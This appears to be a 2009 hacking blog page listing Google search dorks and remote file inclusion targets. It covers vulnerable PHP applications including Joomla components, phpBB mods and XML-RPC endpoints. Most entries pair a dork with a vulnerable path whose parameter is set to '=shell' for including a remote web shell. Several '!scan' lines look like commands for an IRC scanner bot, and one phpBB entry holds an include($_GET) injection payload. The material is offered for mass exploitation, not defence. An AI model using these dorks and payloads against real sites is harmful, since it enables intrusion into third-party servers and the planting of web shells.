Demo Blog

SQL injection

by Boim Blanco on Nov.22, 2009, under

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
8 komentar more...

Bug Dork XML

by Boim Blanco on Nov.22, 2009, under

- active/components/xmlrpc/client.php?c[components]= /Pindorama/
- /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
- /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
- /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
- /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
- /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
- /sitemap.xml.php?dir[classes]= "class.pages.php"
- xmlrpc.php "a web portal system written in PHP."
- xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
- xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
- xmlrpc.php RSS 2.0 * Comments RSS 2.0
- xmlrpc.php "WordPress Module * WordPress ME * WordPress"
- /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
- serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
- /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
- tiki-xmlrpc_services.php tiki-*.php
- xmlrpc.php "[ * powered by b2 * ]"
- xmlrpc.php /b2-include/xmlrpcs.inc on line 182
- /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
- xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
- serendipity_xmlrpc.php "Powered by Serendipity"
- serendipity_xmlrpc.php "Open login screen"
- /b2/xmlsrv/xmlrpc.php "powered by b2"
- /nucleus/xmlrpc/server.php "Nucleus"
- /nucleus/xmlrpc/server.php "index.php?blogid="
- /nucleus/xmlrpc/server.php "The Nucleus Group"
- /xmlsrv/xmlrpc.php 'index.php?blog='
- /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
- /nucleus/xmlrpc/server.php 'index.php?itemid='
- xmlrpc.php "This web site was made with PostNuke"
- xmlrpc.php "Web site powered by PostNuke"
- /faq/xmlrpc.php "powered by phpmyFAQ"
- xmlrpc.php "by the Tiki community"
- phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
- xmlrpc.php "This website is powered by eGroupWare's"
- xmlrpc.php "This website is powered by WordPress"
- adxmlrpc.php "phpAdsNew"
- xmlrpc.php "by each individual author, All Rights Reserved"
- /xmlrpc.php /amfx
- /amfx/xmlrpc.php "BlazeDS"
- /amfx/xmlrpc.php "anything"
- /xmlrpc.php dev-php/PEAR-XML_RPC
- xmlrpc.php "PEAR-XML_RPC"
- xmlrpc.php "phpxmlrpc"
- xmlrpc.php "/PEAR-XML_RPC"
- xmlrpc.php "/pear"
- xmlrpc.php "/SRPMS"
- xmlrpc.php "/php-pear"
- xmlrpc.php "phpMyFAQ"
- xmlrpc.php "PHPXMLRPC"
- xmlrpc.php "Trustix"
- xmlrpc.php "Strayhorn"
- /xmlrpc.php /modules.php?op=modload
- /xmlrpc.php Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom!
- /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes* WordPress ME *
- /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes+wordpress
- /xmlsrv/xmlrpc.php "Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom"
- /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
- /xmlsrv/xmlrpc.php "Original template design by Free CSS Templates"
- /xmlrpc.php "XML-RPC library"
- /pingserver.php /pMachine+pnSession+pmserver+pm
- /pingserver.php /pMachine+pm
- /pingserver.php /pMachine+index.php
- /pingserver.php /pMachine,pMachine
- /xmlrpc.php /include+phpMyFAQ
- /xmlrpc.php TikiWiki+utils.php
- /xmlrpc.php powered+by+postnuke
- /xmlrpc.php "BLOG:CMS"
- /xmlrpc.php "faultString XML error: no element found at line 1"
- /xmlrpc.php "PEAR XML_RPC"
- /xmlrpc.php "Xoops"
- /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
- /xmlrpc.php "postnuke"
- /xmlrpc.php "dailyblog"
- /xmlrpc.php phpgroupware
- /xmlphp.php "XML-RPC for PHP"
- /nucleus/xmlrpc.php Nucleus © 2002-2004 The Nucleus Group - Donate!
- /drupal/xmlrpc.php callback
- /nucleus/xmlrpc/server.php Nucleus © 2002-2004 The Nucleus Group - Donate!
- /xmlrpc.php "Squirrelcart"
- /xmlrpc.php "Powered By Wordpress"
- /xmlrpc.php RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP
- /xmlrpc.php "com_pollxt"
- /adxmlrpc.php /phpAdsNew/ site:.it
- /xmlrpc.php "action"+"poll_ident"
- /xmlrpc.php "webcalendar"
- /WordPress WordPress 1.2.1
- /b2/xmlsrv/xmlrpc.php /b2+site:.it
- /b2evo/xmlsrv/xmlrpc.php /b2evo+site:.it
- /blog/xmlrpc.php /blog+site:.it
- /blog/xmlsrv/xmlrpc.php /blog+site:.it
- /blogs/xmlrpc.php /blogs+site:.it
- /blogs/xmlsrv/xmlrpc.php /blogs+site:.it
- /blogtest/xmlsrv/xmlrpc.php /blogtest+site:.it
- xmlrpc.php "a web portal system written in PHP."
- xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
- xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
- xmlrpc.php RSS 2.0 * Comments RSS 2.0
- xmlrpc.php "WordPress Module * WordPress ME * WordPress"
- /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
- serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
- xmlrpc.php "WordPress Module * WordPress ME * WordPress"
- serendipity_xmlrpc.php "Powered by. Serendipity PHP Weblog"
- /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
- tiki-xmlrpc_services.php tiki-*.php
- xmlrpc.php "[ * powered by b2 * ]"
- xmlrpc.php /b2-include/xmlrpcs.inc on line 182
- /xmlsrv/xmlrpc.php /blogs/b2evocore/_functions.php
- /xmlsrv/xmlrpc.php /b2evocore/_functions.php
- /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
- xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
- serendipity_xmlrpc.php "Powered by Serendipity"
- serendipity_xmlrpc.php "Open login screen"
- /b2/xmlsrv/xmlrpc.php "powered by b2"
- /nucleus/xmlrpc/server.php "Nucleus" site:it
- /nucleus/xmlrpc/server.php "index.php?blogid=" site:.it
- /nucleus/xmlrpc/server.php "The Nucleus Group" site:.it
- /xmlsrv/xmlrpc.php 'index.php?blog='
- /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
- /nucleus/xmlrpc/server.php 'index.php?itemid='
- xmlrpc.php "This web site was made with PostNuke"
- xmlrpc.php "Web site powered by PostNuke"
- /faq/xmlrpc.php "powered by phpmyFAQ"
- /faq/xmlrpc.php "/index.php?p=faq"
- /faq/xmlrpc.php "/index.php?pg=faq"
- /faq/xmlrpc.php "/index.php?pag=faq"
- /faq/xmlrpc.php "/index.php?page=faq"
- /faq/xmlrpc.php "/?faq"
- xmlrpc.php "by the Tiki community"
- phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
- xmlrpc.php "This website is powered by eGroupWare's"
- xmlrpc.php "This website is powered by WordPress"
- adxmlrpc.php "phpAdsNew"
- xmlrpc.php "by each individual author, All Rights Reserved"
0 komentar more...

Bug Dork RFI PHPBB

by Boim Blanco on Nov.22, 2009, under

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=
0 komentar more...

Bug Dork RFI (joomla)

by Boim Blanco on Nov.22, 2009, under

1---------------------------------------------------------------------------------
Google Dork:
inurl:"com_admin"


/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
2---------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_simpleboard


/components/com_simpleboard/file_upload.php?sbp=shell
3---------------------------------------------------------------------------------
Google Dork:
inurl:"com_hashcash"


/components/com_hashcash/server.php?mosConfig_absolute_path=shell
4---------------------------------------------------------------------------------
Google Dork:
inurl:"com_htmlarea3_xtd-c"


/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
5---------------------------------------------------------------------------------
Google Dork:
inurl:"com_sitemap"


/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
6---------------------------------------------------------------------------------
Google Dork:
inurl:"com_performs"


/components/com_performs/performs.php?mosConfig_absolute_path=shell
7---------------------------------------------------------------------------------
Google Dork:
inurl:"com_forum"


/components/com_forum/download.php?phpbb_root_path=
8---------------------------------------------------------------------------------
Google Dork:
inurl:"com_pccookbook"


/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
9---------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_extcalendar


/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
10--------------------------------------------------------------------------------
Google Dork:
inurl:"minibb"


/components/minibb/index.php?absolute_path=shell
11--------------------------------------------------------------------------------
Google Dork:
inurl:"com_smf"


/components/com_smf/smf.php?mosConfig_absolute_path=
P0C2 By Mr.aFiR:
/modules/mod_calendar.php?absolute_path=shell
12--------------------------------------------------------------------------------
Google Dork:
inurl:"com_pollxt"


/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
13--------------------------------------------------------------------------------
Google Dork:
inurl:"com_loudmounth"


/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
14--------------------------------------------------------------------------------
Google Dork:
inurl:"com_videodb"


/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l
15--------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_pcchess


/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
16--------------------------------------------------------------------------------
Google Dork:
inurl:"com_multibanners"


/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell
17--------------------------------------------------------------------------------
Google Dork:
inurl:"com_a6mambohelpdesk"


/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l
18--------------------------------------------------------------------------------
Google Dork:
inurl:"com_colophon"


/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
19--------------------------------------------------------------------------------
Google Dork:
inurl:"com_mgm"


/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
20--------------------------------------------------------------------------------
Google Dork:
inurl:"com_mambatstaff"


/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
21--------------------------------------------------------------------------------
Google Dork:
inurl:"com_securityimages"


/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell


/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
22--------------------------------------------------------------------------------
Google Dork:
inurl:"com_artlinks"


/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
23--------------------------------------------------------------------------------
Google Dork:
inurl:"com_galleria"


/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
24--------------------------------------------------------------------------------
Google Dork:
inurl:"com_akocomment"


/akocomments.php?mosConfig_absolute_path=shell
25--------------------------------------------------------------------------------
Google Dork:
inurl:"com_cropimage"

/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
26--------------------------------------------------------------------------------
Google Dork:
inurl:"com_kochsuite"

/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
27--------------------------------------------------------------------------------
Google Dork:
inurl:"com_comprofiler"

/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
28--------------------------------------------------------------------------------
Google Dork:
inurl:"com_zoom"

/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell


/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
29--------------------------------------------------------------------------------
Google Dork:
inurl:"com_serverstat"

/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll
30--------------------------------------------------------------------------------
Google Dork:
inurl:"com_fm"

/components/com_fm/fm.install.php?lm_absolute_path=shell
31--------------------------------------------------------------------------------
Google Dork:
inurl:com_mambelfish


/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
32--------------------------------------------------------------------------------
Google Dork:
inurl:com_lmo


/components/com_lmo/lmo.php?mosConfig_absolute_path=shell
33--------------------------------------------------------------------------------
Google Dork:
inurl:com_linkdirectory


/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell
34--------------------------------------------------------------------------------
Google Dork:
inurl:com_mtree


/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell
35--------------------------------------------------------------------------------
Google Dork:
inurl:com_jim

/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
36--------------------------------------------------------------------------------
Google Dork:
inurl:com_webring


/administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
37--------------------------------------------------------------------------------
Google Dork:
inurl:com_remository


/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
38--------------------------------------------------------------------------------
Google Dork:
inurl:com_babackup


/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
39--------------------------------------------------------------------------------
Google Dork:
inurl:com_lurm_constructor


/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
40--------------------------------------------------------------------------------
Google Dork:
inurl:com_mambowiki


/components/com_mambowiki/ MamboLogin.php?IP=shell
41--------------------------------------------------------------------------------
Google Dork:
inurl:com_a6mambocredits


/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
42--------------------------------------------------------------------------------
Google Dork:
inurl:com_phpshop


/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell
43--------------------------------------------------------------------------------
Google Dork:
inurl:com_cpg


/components/com_cpg/cpg.php?mosConfig_absolute_path=shell
44--------------------------------------------------------------------------------
Google Dork:
inurl:com_moodle


/components/com_moodle/moodle.php?mosConfig_absolute_path=shell
45--------------------------------------------------------------------------------
Google Dork:
inurl:com_extended_registration


/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell
46--------------------------------------------------------------------------------
Google Dork:
inurl:com_mospray


/components/com_mospray/scripts/admin.php?basedir=shell
47--------------------------------------------------------------------------------
Google Dork:
inurl:com_bayesiannaivefilter


/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
48--------------------------------------------------------------------------------
Google Dork:
inurl:com_uhp


/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
49--------------------------------------------------------------------------------
Google Dork:
inurl:com_peoplebook


/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
50--------------------------------------------------------------------------------
Google Dork:
inurl:com_mmp


/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
51--------------------------------------------------------------------------------
Google Dork:
inurl:com_reporter


/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
52--------------------------------------------------------------------------------
Google Dork:
inurl:com_madeira


/components/com_madeira/img.php?url=shell
53--------------------------------------------------------------------------------
Google Dork:
inurl:com_jd-wiki


/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
54--------------------------------------------------------------------------------
Google Dork:
inurl:com_bsq_sitestats


/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell


/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
0 komentar more...

Bug Dork RFI

by Boim Blanco on Nov.22, 2009, under

!scan ///////?cmd&file= "List Users with Pics only?"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan /?installed_config_file= "PhpJobScheduler"
!scan /pjsfiles/modify.php?installed_config_file= "PhpJobScheduler"
!scan errors.php?error= "/com_rwcards" "/com_rwcards"
!scan //vwar/backup/errors.php?error= "errors.php"
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= "netcat require"
!scan /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= "php?option=com_rwcards" "php?option=com_rwcards"
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums"
!scan phphtml.php?htmlclass_path= "phphtml.php"
!scan /?path%5Bdocroot%5D= "/newspublish" "/newspublish"
!scan ?sIncPath= "powered by boonex"
!scan plugins/safehtml/HTMLSax3.php?dir[plugins]= "powered by boonex"
!scan errors.php?error= "powered by boonex"
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= "powered by boonex"
!scan errors.php?error= "/ray.3.5" "/ray.3.5"
!scan ?sourcedir= index.php?sourcedir=
!scan errors.php?error= "/com_ponygallery"
!scan /?page= /?pagedb=?
!scan /?page= "ArticleBeach"
!scan /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php
!scan errors.php?error= "Powered by Orca Interactive Forum Script"
!scan /?include_path= "guestbook"
!scan /?include_path= "action"+"poll_ident"
!scan /admin/include/lib.module.php?mod_root= "/cmsworks"
!scan errors.php?error= "/com_extcalendar"
!scan /admin/templates/template_thumbnail.php?thumb_template= "Powered by HomePH Design"
!scan /includes/header.php?c_temp_path= "/header.php"
!scan /include/admin.lib.inc.php?site_path= "include/lib.inc.php"
!scan errors.php?error= "phpkit" "phpkit"
!scan errors.php?error= "/contenido/includes"
!scan popup.php?path= "phpkit" "phpkit"

!scan includes/ktedit/toolbar.php?dirDepth= ktmlpro
!scan ?custompluginfile%5B%5D= Subdreamer categoryid
!scan ?custompluginfile%5B%5D= “Website Powered by Subdreamer”
!scan include/lib.inc.php?site_path= rgboard ppppppppp
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= “/includes/mambo.php”
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= “mambo/index.php”
!scan demo1/auction_confirmation.inc.php/header.php?prefix= browse.php?id=?
!scan phpAdsNew/view.inc.php?phpAds_path= auction/index.php
!scan playing.php/common/db.php?commonpath= inurl:”playing.php”
!scan viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= “Powered by phpBB 2.0? “Powered by phpBB 2.0?+org “Powered by phpBB 2.0? “Powered by phpBB 2.0?+hk
!scan errors.php?error= “index of” errors.php
!scan index.php?option=com_custompages&cpage= inurl:”com_custompages”
!scan index2.php?option=com_custompages&cpage= inurl:”com_custompages”
!scan mainbody.php?option=com_custompages&cpage= inurl:”com_custompages”
!scan editsite.php?returnpath= “editsite.php”
!scan slice.php3?GLOBALS[AA_INC_PATH]= slice.php3?GLOBALS[AA_INC_PATH]=
!scan files/carprss.php?CarpPath= “by SiteBuilder Elite”
!scan accounts/inc/include.php?language=0&lang_settings[0][1]= “Powered by IceWarp Software Merak Email Server” IceWarp Web Mail 5.4
!scan config.inc.php?path_escape= home “post ad” “post event” “post image”
!scan ipblock.inc.php?path_escape= home “post ad” “post event” “post image”
!scan ipblock.inc.php?path_escape= event(s) today “All Upcoming Events”
!scan ws/login.php?noSet=0&includedir= “Public Access (Login)” WebCalendar
!scan vwar/convert/mvcw.php?step=1&vwar_root= “de/vwar”
!scan protection.php?action=logout&siteurl= “approved by TheFanlistings.org”
!scan ?mosConfig_absolute_path= “Free Software released under the GNU/GPL License”
!scan ?mosConfig_absolute_path= Joomla Template by
!scan plugins/spamx/MassDelete.Admin.class.php?_CONF[path]= “All trademarks and copyrights on this page are owned by their respective owners” Geeklog
!scan plugins/spamx/MailAdmin.Action.class.php?_CONF[path]= “Powered By GeekLog” “Created this page in” seconds
!scan admin.php?include_path= “Teken het gastenboek” Onderhoud

>> –>

!scan includes/db_connect.php?baseDir= “Version 2.0.4 “You must have cookies enabled in your browser”
!scan bookmark4u/lostpasswd.php?env[include_prefix]= bookmark4u214\1234567890'/*
!scan protection.php?action=logout&siteurl= “Members” “The complete list” “view sorted by country” “/members.php?id=all” >> mulai
!scan protection.php?action=logout&siteurl= “/members.php?id=all”
!scan protection.php?action=logout&siteurl= “Members” “The complete list” “view sorted by country” “ID” “Name” “Email” “URL”
!scan accueil.php?menu= “asso.fr/accueil.php?menu=”
!scan comments-display-tpl.php?config[comments_form_tpl]= “Powered By TalkBack”
!scan /?file= inurl:?/?file=contact? intext:?About Us? -cfm -asp -index.php -.cgi -aspx mulai
!scan modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “.php?name=Forums”
!scan modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= PNphpBB2
!scan plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]= geeklog
!scan admin.php?include_path= “IP-adres genoteerd” “HTML is”
!scan index.php?strona= “/index.php?strona=”
!scan index.php?strona= “/index.php?strona=” site:pl oiui
!scan index1.php?page= “/index1.php?page=”
!scan index1.php?page= “/index1.php?page=” “.php”
!scan includes/functions_mod_user.php?phpbb_root_path= phpBBViet
!scan ?mosConfig_absolute_path= “Joomla! is Free Software released under the GNU/GPL License.”
!scan ?mosConfig_absolute_path= “Joomla Is”
!scan language/lang_english/lang_main_album.php?phpbb_root_path= “Czech translation by Vitek”
!scan index.php?pg= “Search | Invite | Mail | Blog | Forum” site:mx
!scan administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= inurl:”com_jjgallery
!scan modules/Neos_Chronos/header.php?base_folder= “Neos_Chronos”
!scan historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
!scan includes/messages.inc.php?include_path= messages.inc.php
!scan contact.php?AD_BODY_TEMP= “Not+required+for+reporting+a+file”
!scan includes/db_connect.php?baseDir= “dotProject” “Version” “cookie” site:cn
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= /modules/Forums/
!scan contenido/classes/class.inuse.php?cfg[path][contenido]= Contenido Login
!scan includes/db_connect.php?baseDir= “dotProject logo”
!scan index.php?lg= “index.php?lg=” site:be
!scan skin/zero_vote/ask_password.php?dir= zeroboard site:.us
!scan admin.php?include_path= “Total Records:” “HTML code is” “Advanced” site:.com
!scan index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= mambo
!scan admin.php?include_path= “Total Records:” “HTML code is” “Advanced
!scan components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= com_pollxt
!scan administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= com_colophon
!scan components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= com_loudmounth
!scan components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= com_videodb
